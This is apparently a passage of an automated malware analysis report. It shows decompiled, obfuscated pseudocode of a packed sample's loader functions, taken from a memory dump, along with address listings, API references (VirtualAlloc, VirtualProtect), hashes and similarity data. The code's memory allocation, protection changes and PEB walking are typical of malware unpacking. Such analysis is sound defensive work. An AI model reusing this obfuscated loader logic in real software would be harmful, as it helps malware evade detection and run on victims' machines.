					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E023D4E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E023D2FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x023d5f16
0x023d5f16
0x023d5f16
0x023d5f17
0x023d5f1b
0x023d5f1e
0x023d5f20
0x023d5f23
0x023d5f24
0x023d5f28
0x023d5f2b
0x023d5f2c
0x023d5f30
0x023d5f39
0x023d5f3a
0x023d5f3d
0x023d5f46
0x023d5f4a
0x023d5f4d
0x023d5f56
0x023d5f57
0x023d5f5a
0x023d5f5d
0x023d5f63
0x023d5f66
0x023d5f6e
0x023d5f71
0x023d5f72
0x023d5f75
0x023d5f78
0x023d5f7b
0x023d5f84
0x023d5f85
0x023d5f88
0x023d5f8b
0x023d5f91
0x023d5f94
0x023d5f9d
0x023d5f9e
0x023d5fa2
0x023d5fa5
0x023d5fab
0x023d5fb1
0x023d5fb5
0x023d5fb8
0x023d5fbb
0x023d5fbe
0x023d5fc0
0x023d5fcb
0x023d5fd2
0x023d5fda
0x023d5fdd
0x023d5fe6
0x023d5fe7
0x023d5fea
0x023d5ff3
0x023d5ff4
0x023d5ff7
0x023d5ffa
0x023d5ffa
0x023d6002
0x023d6005
0x023d6009
0x023d600d
0x023d6017
0x023d601b
0x023d6025
0x023d6029
0x023d602c
0x023d6032
0x023d6039
0x023d604b
0x023d6054
0x023d605e
0x023d6067
0x023d6068
0x023d606b
0x023d606e
0x023d6074
0x023d607b
0x023d607e
0x023d6088
0x023d608b
0x023d6094
0x023d6095
0x023d6098
0x023d609b
0x023d60a1
0x023d60a7
0x023d60ae
0x023d60b7
0x023d60be
0x023d60c1
0x023d60c8
0x023d60cb
0x023d60d4
0x023d60db
0x023d60de
0x023d60e4
0x023d60e7
0x023d60ee
0x023d60f1
0x023d60f4
0x023d60f7
0x023d60f8
0x023d6106
0x023d6108
0x023d610b
0x023d6114
0x023d6118
0x023d6124
0x023d6127
0x023d612d
0x023d6133
0x023d613a
0x023d6140
0x023d6147
0x023d614a
0x023d614f
0x023d6156
0x023d615c
0x023d615f
0x023d6162
0x023d616b
0x023d616e
0x023d6172
0x023d6176
0x023d617a
0x023d617e
0x023d6188
0x023d618c
0x023d6195
0x023d619c
0x023d619f
0x023d61ab
0x023d61b2
0x023d61be
0x023d61c1
0x023d61c8
0x023d61d1
0x023d61db
0x023d61de
0x023d61e5
0x023d61e8
0x023d61f1
0x023d61fb
0x023d61fe
0x023d6206
0x023d6209
0x023d6210
0x023d6213
0x023d6216
0x023d6219
0x023d621a
0x023d621b
0x023d6231
0x023d6239
0x023d6240
0x023d6249
0x023d6253
0x023d6256
0x023d6256
0x023d625e
0x023d6265
0x023d626b
0x023d626c
0x023d6276
0x023d6279
0x023d6283
0x023d628c
0x023d6296
0x023d6299
0x023d629f
0x023d62a9
0x023d62b5
0x023d62b8
0x023d62c3
0x023d62c6
0x023d62cd
0x023d62ce
0x023d62d1
0x023d62d2
0x023d62dd
0x023d62df
0x023d62e4
0x023d62ec
0x023d62f6
0x023d6300
0x023d6303
0x023d6306
0x023d630c
0x023d6314
0x023d631b
0x023d6321
0x023d6321
0x023d632a
0x023d632d
0x023d6335
0x023d6338
0x023d633b
0x023d633e
0x023d633f
0x023d6343
0x023d634d
0x023d6351
0x023d635d
0x023d6360
0x023d6368
0x023d636f
0x023d6375
0x023d637c
0x023d637f
0x023d6385
0x023d6389
0x023d638c
0x023d6396
0x023d6399
0x023d63a2
0x023d63a9
0x023d63ac
0x023d63b4
0x023d63bb
0x023d63c1
0x023d63c7
0x023d63ca
0x023d63d1
0x023d63d3
0x023d63dc
0x023d63e6
0x023d63e9
0x023d63f0
0x023d63f3
0x023d63fd
0x023d6400
0x023d6403
0x023d6412
0x023d6417
0x023d641b
0x023d641e
0x023d6420
0x023d6421
0x023d642c
0x023d642e
0x023d6433
0x023d643c
0x023d643f
0x023d6448
0x023d6452
0x023d6455
0x023d6455
0x023d6461
0x023d6468
0x023d646e
0x023d6474
0x023d6477
0x023d6483
0x023d6486
0x023d648c
0x023d6494
0x023d649b
0x023d64a1
0x023d64a6
0x023d64b2
0x023d64b6
0x023d64b9
0x023d64c1
0x023d64c5
0x023d64c8
0x023d64d4
0x023d64db
0x023d64e1
0x023d64e3
0x023d64e6
0x023d64f2
0x023d64f5
0x023d64fe
0x023d650a
0x023d650d
0x023d6515
0x023d6518
0x023d651f
0x023d6522
0x023d6525
0x023d6528
0x023d6529
0x023d6537
0x023d6539
0x023d653c
0x023d653e
0x023d6544
0x023d654e
0x023d6551
0x023d6558
0x023d655c
0x023d655f
0x023d655f
0x023d6567
0x023d656e
0x023d6574
0x023d6575
0x023d6586
0x023d6590
0x023d6593
0x023d659a
0x023d659e
0x023d65a1
0x023d65a9
0x023d65b0
0x023d65b6
0x023d65b7
0x023d65ca
0x023d65cc
0x023d65ce
0x023d65d2
0x023d65d5
0x023d65db
0x023d65e5
0x023d65e8
0x023d65ee
0x023d65f6
0x023d65fd
0x023d6603
0x023d660b
0x023d6610
0x023d6618
0x023d661b
0x023d6622
0x023d6625
0x023d662b
0x023d6632
0x023d6635
0x023d663c
0x023d6640
0x023d6643
0x023d664a
0x023d664e
0x023d6651
0x023d6659
0x023d665f
0x023d6666
0x023d6667
0x023d666a
0x023d666b
0x023d6671
0x023d6674
0x023d6677
0x023d667a
0x023d6685
0x023d668f
0x023d6693
0x023d6696
0x023d669d
0x023d66a0
0x023d66a3
0x023d66a3
0x023d66a9
0x023d66ac
0x023d66af
0x023d66c2
0x023d66c6
0x023d66c9
0x023d66d2
0x023d66dc
0x023d66e8
0x023d66eb
0x023d66f1
0x023d66f8
0x023d66fe
0x023d6703
0x023d6706
0x023d670b
0x023d670e
0x023d6713
0x023d671a
0x023d671d
0x023d6720
0x023d6727
0x023d6730
0x023d673a
0x023d673d
0x023d6743
0x023d674d
0x023d6757
0x023d675b
0x023d675e
0x023d676d
0x023d6774
0x023d6777
0x023d677a
0x023d677d
0x023d677e
0x023d677f
0x023d6781
0x023d678c
0x023d6791
0x023d679a
0x023d679d
0x023d67a7
0x023d67ab
0x023d67ae
0x023d67b4
0x023d67b6
0x023d67bd
0x023d67c3
0x023d67c4
0x023d67c7
0x023d67cc
0x023d67cf
0x023d67d2
0x023d67d2
0x023d67d3
0x023d67dd
0x023d67e0
0x023d67e7
0x023d67f1
0x023d67f4
0x023d67f7
0x023d67fe
0x023d6801
0x023d680b
0x023d680f
0x023d6812
0x023d681d
0x023d6824
0x023d6827
0x023d682a
0x023d682d
0x023d682e
0x023d682f
0x023d6841
0x023d684c
0x023d6858
0x023d685b
0x023d6861
0x023d6868
0x023d686e
0x023d6873
0x023d6876
0x023d687e
0x023d6881
0x023d6881
0x023d6889
0x023d688d
0x023d6897
0x023d689b
0x023d68a4
0x023d68ae
0x023d68b1
0x023d68bd
0x023d68c4
0x023d68cd
0x023d68d0
0x023d68d3
0x023d68e0
0x023d68e4
0x023d68e7
0x023d68f0
0x023d68f7
0x023d6900
0x023d6901
0x023d6904
0x023d6907
0x023d6913
0x023d6916
0x023d6919
0x023d6926
0x023d692f
0x023d6939
0x023d693c
0x023d6945
0x023d6951
0x023d6954
0x023d6960
0x023d6968
0x023d696c
0x023d6971
0x023d6972
0x023d697d
0x023d697f
0x023d6984
0x023d6986
0x023d698d
0x023d6990
0x023d6993
0x023d699a
0x023d699d
0x023d69a0
0x023d69a6
0x023d69ae
0x023d69b5
0x023d69bb
0x023d69c0
0x023d69c3
0x023d69c6
0x023d69cd
0x023d69d0
0x023d69d6
0x023d69d9
0x023d69e0
0x023d69e4
0x023d69e7
0x023d69f0
0x023d69f3
0x023d69fb
0x023d6a02
0x023d6a08
0x023d6a0b
0x023d6a0e
0x023d6a13
0x023d6a1a
0x023d6a1e
0x023d6a24
0x023d6a27
0x023d6a30
0x023d6a33
0x023d6a3f
0x023d6a46
0x023d6a4f
0x023d6a52
0x023d6a56
0x023d6a5d
0x023d6a64
0x023d6a67
0x023d6a6e
0x023d6a72
0x023d6a75
0x023d6a7c
0x023d6a80
0x023d6a83
0x023d6a8a
0x023d6a8d
0x023d6a90
0x023d6a9f
0x023d6aa6
0x023d6aa9
0x023d6aac
0x023d6aaf
0x023d6ab0
0x023d6ab3
0x023d6abe
0x023d6ac0
0x023d6ac3
0x023d6ac5
0x023d6acc
0x023d6acf
0x023d6ad2
0x023d6ad9
0x023d6adc
0x023d6adf
0x023d6ae5
0x023d6aec
0x023d6af2
0x023d6af2
0x023d6af5
0x023d6af8
0x023d6afc
0x023d6aff
0x023d6b02
0x023d6b09
0x023d6b0c
0x023d6b0f
0x023d6b17
0x023d6b1e
0x023d6b24
0x023d6b25
0x023d6b2c
0x023d6b2f
0x023d6b35
0x023d6b3f
0x023d6b42
0x023d6b49
0x023d6b4c
0x023d6b4f
0x023d6b55
0x023d6b5c
0x023d6b62
0x023d6b65
0x023d6b6b
0x023d6b71
0x023d6b7b
0x023d6b7e
0x023d6b85
0x023d6b88
0x023d6b8b
0x023d6b91
0x023d6b99
0x023d6ba0
0x023d6ba6
0x023d6ba6
0x023d6baf
0x023d6bbb
0x023d6bc5
0x023d6bcf
0x023d6bd2
0x023d6bd5
0x023d6bdb
0x023d6be2
0x023d6be8
0x023d6bf4
0x023d6bf6
0x023d6bfd
0x023d6c07
0x023d6c10
0x023d6c17
0x023d6c20
0x023d6c21
0x023d6c24
0x023d6c27
0x023d6c2d
0x023d6c30
0x023d6c3a
0x023d6c3d
0x023d6c40
0x023d6c46
0x023d6c4d
0x023d6c59
0x023d6c5c
0x023d6c6b
0x023d6c72
0x023d6c75
0x023d6c78
0x023d6c7b
0x023d6c7c
0x023d6c7d
0x023d6c88
0x023d6c8a
0x023d6c8f
0x023d6c98
0x023d6c9b
0x023d6ca5
0x023d6ca9
0x023d6cac
0x023d6cac
0x023d6cb4
0x023d6cbb
0x023d6cc2
0x023d6ccc
0x023d6cd5
0x023d6cdc
0x023d6cdf
0x023d6ce8
0x023d6cf1
0x023d6cf8
0x023d6cfb
0x023d6d06
0x023d6d09
0x023d6d10
0x023d6d11
0x023d6d14
0x023d6d15
0x023d6d1b
0x023d6d1e
0x023d6d21
0x023d6d24
0x023d6d2d
0x023d6d30
0x023d6d39
0x023d6d40
0x023d6d43
0x023d6d43
0x023d6d49
0x023d6d51
0x023d6d58
0x023d6d63
0x023d6d6b
0x023d6d6d
0x023d6d6f
0x023d6d73
0x023d6d7c
0x023d6d86
0x023d6d90
0x023d6d93
0x023d6d96
0x023d6d9c
0x023d6da4
0x023d6dab
0x023d6db1
0x023d6dba
0x023d6dc4
0x023d6dc5
0x023d6dc8
0x023d6dcb
0x023d6dce
0x023d6dcf
0x023d6dd0
0x023d6dda
0x023d6de4
0x023d6de8
0x023d6df1
0x023d6dfb
0x023d6dfe
0x023d6e06
0x023d6e0d
0x023d6e13
0x023d6e16
0x023d6e19
0x023d6e1c
0x023d6e20
0x023d6e24
0x023d6e2e
0x023d6e31
0x023d6e34
0x023d6e3b
0x023d6e3e
0x023d6e48
0x023d6e4b
0x023d6e4e
0x023d6e5a
0x023d6e62
0x023d6e66
0x023d6e6b
0x023d6e6c
0x023d6e72
0x023d6e75
0x023d6e78
0x023d6e7b
0x023d6e7d
0x023d6e84
0x023d6e87
0x023d6e8a
0x023d6e91
0x023d6e94
0x023d6e97
0x023d6e9d
0x023d6ea4
0x023d6eaa
0x023d6eaa
0x023d6eb9
0x023d6ec8
0x023d6ec9
0x023d6ec9
0x023d6ec9
0x023d6ed4
0x023d6ed7
0x023d6ee0
0x023d6ee2
0x023d6ee3
0x023d6ee3
0x023d6ee3
0x023d6eec
0x023d6eef
0x023d6ef2
0x023d6f07
0x023d6f0a
0x023d6f0d
0x023d6f10
0x023d6f11
0x023d6f14
0x023d6f1b
0x023d6f21
0x023d6f22
0x023d6f31
0x023d6f33
0x023d6f39
0x023d6f3c
0x023d6f40
0x023d6f43
0x023d6f4b
0x023d6f4e
0x023d6f4e
0x023d6f61
0x023d6f68

APIs

VirtualProtect.KERNELBASE ref: 023D6B65

Memory Dump Source

Source File: 00000003.00000002.274904085.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: 8ccf291286d18d54717e347f4ed8cce2ef3f07c3c72e2afd82d4ed46c299dc4d
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: FFC22472844608EFEB049FA0C8C57EEBBF5FF48320F0589ADD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 023D709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E023D709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E023D2D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E023D746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E023D2A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E023D5F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E023D8F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x023d709d
0x023d709d
0x023d709d
0x023d709d
0x023d709e
0x023d70a5
0x023d70ab
0x023d70ae
0x023d70af
0x023d70b2
0x023d70b6
0x023d70ba
0x023d70c1
0x023d70cb
0x023d70d0
0x023d70d0
0x023d70d6
0x023d70dd
0x023d70e0
0x023d70e3
0x023d70e9
0x023d70f5
0x023d70fc
0x023d7102
0x023d710a
0x023d710c
0x023d7112
0x023d7119
0x023d711d
0x023d712b
0x023d712b
0x023d7135
0x023d7138
0x023d7138
0x023d713e
0x023d7146
0x023d714a
0x023d714b
0x023d7153
0x023d7157
0x023d7158
0x023d715d
0x023d7163
0x023d7166
0x023d7169
0x023d716c
0x023d7179
0x023d717d
0x023d717f
0x023d7181
0x023d7182
0x023d7184
0x023d718e
0x023d7191
0x023d7191
0x023d719d
0x023d719e
0x023d719e
0x023d719e
0x023d71a6
0x023d71a8
0x023d71b0
0x023d71b4
0x023d71b5
0x023d71ba
0x023d71c2
0x023d71c6
0x023d71c7
0x023d71c7
0x023d71cc
0x023d71e0
0x023d71ea
0x023d71f0
0x023d71f1
0x023d71f7
0x023d71fb
0x023d71ff
0x023d7201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 023D70D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 023D7138

Memory Dump Source

Source File: 00000003.00000002.274904085.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 6e857dcc15efb05415dc30ffd278695795845a2f9b757cd20d58447514e97a72
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: A0417E72904204EFEB049F64D885BAEBBF5EF88310F05849DEC88AB246C7702951DB69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023D2A69, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E023D2A69(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t63;
				signed int _t70;
				signed int _t75;
				signed int _t88;
				signed int _t91;
				signed int _t105;
				signed int _t109;
				signed int _t112;
				signed int _t125;
				void* _t129;
				signed int* _t140;

				_push(_v16);
				 *_t140 = __eax;
				_push(__edi);
				 *_t140 =  *_t140 ^ __edi;
				 *_t140 =  *_t140 ^ __ecx;
				_push(_v12);
				 *_t140 = __edx;
				_push(__ecx);
				 *_t140 =  *_t140 ^ __ecx;
				 *_t140 =  *_t140 + __edi;
				_push(__ecx);
				 *_t140 =  *_t140 - __ecx;
				 *_t140 = __esi;
				if( *((intOrPtr*)(__ebx + 0x41ce4a)) != 1) {
					_v16 = __edx;
					_t103 = 0 ^  *(__ebx + 0x41c3f9);
					_push(__esi);
					_pop(_t125);
					_v16 = _t125;
					_t105 =  *(__ebx + 0x41c166) +  *((intOrPtr*)((__eax & 0x00000000 | __esi & 0x00000000 ^  *((0 ^  *(__ebx + 0x41c3f9)) + 0x3c)) + _t103 + 0x28));
					 *_t17 = _t105;
					_push(_v8);
					_pop(_t88);
					_t107 = _t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166);
					_t91 = _t88;
					 *_t140 = __ecx;
					_t70 = 0;
					_push(0);
					 *_t140 =  *_t140 ^ _v16;
					_push( *((intOrPtr*)((0 ^  *((_t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166)) + 0x3c)) + _t107 + 0x28)));
					_pop(_t129);
					_t109 = _t129 +  *(__ebx + 0x41c166);
					_v12 = _t70;
					_t52 = 0 ^ _t109;
					 *_t140 = _t109;
					_t112 = 0;
					_push(__ebx);
					_t75 = _v12 & 0x00000000 ^ __ebx & 0x00000000 ^  *( *((intOrPtr*)((0 ^  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t75;
					_pop(_t63);
					while(1) {
						_t112 = _t112 & 0x00000000 ^ _t91 ^  *_t140 ^  *(_t75 + 0x1c);
						_t91 = _t91;
						__eflags = _t52 - _t112;
						if(_t52 == _t112) {
							break;
						}
						__eflags = _t91 - _t112;
						if(__eflags != 0) {
							_t75 =  *(_t75 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t63 + 0x41ce4a)) = 1;
								_pop( *_t42);
								_pop( *_t44);
								_pop( *_t46);
								_t54 = _t52 & 0x00000000 ^ _t140[1];
								__eflags = _t54;
								return _t54;
							}
						} else {
							_pop( *_t36);
							_pop( *_t38);
							_t56 = _t52 & 0x00000000 |  *(_t140 - 0xfffffffc + 4);
							__eflags = _t56;
							return _t56;
						}
						goto L9;
					}
					_v8 = _t63;
					 *(_t75 + 0x1c) = _t91;
					_pop( *_t32);
					__eflags = 0 ^ _t140[2];
					_pop( *_t34);
					return _v8;
				} else {
					_pop( *_t4);
					_pop( *_t6);
					return  *((intOrPtr*)( &(_t140[1]) - 0xfffffffc));
				}
				L9:
			}

0x023d2a6f
0x023d2a72
0x023d2a75
0x023d2a76
0x023d2a79
0x023d2a7c
0x023d2a7f
0x023d2a82
0x023d2a83
0x023d2a86
0x023d2a89
0x023d2a8a
0x023d2a8d
0x023d2a97
0x023d2ac9
0x023d2ad4
0x023d2ad9
0x023d2ae5
0x023d2aea
0x023d2af9
0x023d2afb
0x023d2afe
0x023d2b01
0x023d2b0f
0x023d2b11
0x023d2b14
0x023d2b1e
0x023d2b23
0x023d2b25
0x023d2b28
0x023d2b29
0x023d2b30
0x023d2b33
0x023d2b3a
0x023d2b41
0x023d2b4f
0x023d2b53
0x023d2b5d
0x023d2b5d
0x023d2b5f
0x023d2b60
0x023d2b6a
0x023d2b6c
0x023d2b6d
0x023d2b6f
0x00000000
0x00000000
0x023d2bb4
0x023d2bb6
0x023d2bf2
0x023d2bf5
0x00000000
0x023d2bfb
0x023d2bfb
0x023d2c05
0x023d2c11
0x023d2c1d
0x023d2c35
0x023d2c35
0x023d2c3c
0x023d2c3c
0x023d2bb8
0x023d2bb8
0x023d2bc4
0x023d2be8
0x023d2be8
0x023d2bef
0x023d2bef
0x00000000
0x023d2bb6
0x023d2b71
0x023d2b78
0x023d2b9c
0x023d2ba4
0x023d2baa
0x023d2bb1
0x023d2a99
0x023d2a9f
0x023d2aaf
0x023d2ac6
0x023d2ac6
0x00000000

Memory Dump Source

Source File: 00000003.00000002.274904085.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction ID: e1684fbe26696ac704eb2691fc5eef9d59217843a77ea281d2810cea2642b828
